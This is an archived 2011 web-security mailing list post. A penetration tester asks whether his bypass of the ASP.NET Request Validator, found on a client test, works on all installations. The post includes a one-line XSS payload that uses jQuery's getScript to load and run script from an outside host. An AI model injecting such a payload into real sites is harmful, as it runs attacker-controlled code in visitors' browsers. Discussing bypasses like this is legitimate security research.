[WEB SECURITY] ASP.NET Request Validator Bypass?

Ryan Dewhurst ryandewhurst at gmail.com
Sat Feb 19 10:39:06 EST 2011


Hi,

Recently on a client test I was able to bypass the ASP.NET Request Validator
by leveraging the jQuery library which was included in the page. I am mainly
a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.

I was wondering if any one could confirm whether my bypass affects all
ASP.NET installations or whether or not this particular client had it
configured incorrectly.

I used the following jQuery function to bypass the filter:
$.getScript('//ha.ckers.org/.j');

Thanks,
Ryan

Ryan Dewhurst

blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk | www.webwordcount.com
twitter www.twitter.com/ethicalhack3r
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20110219/136890f8/attachment-0003.html>


More information about the websecurity mailing list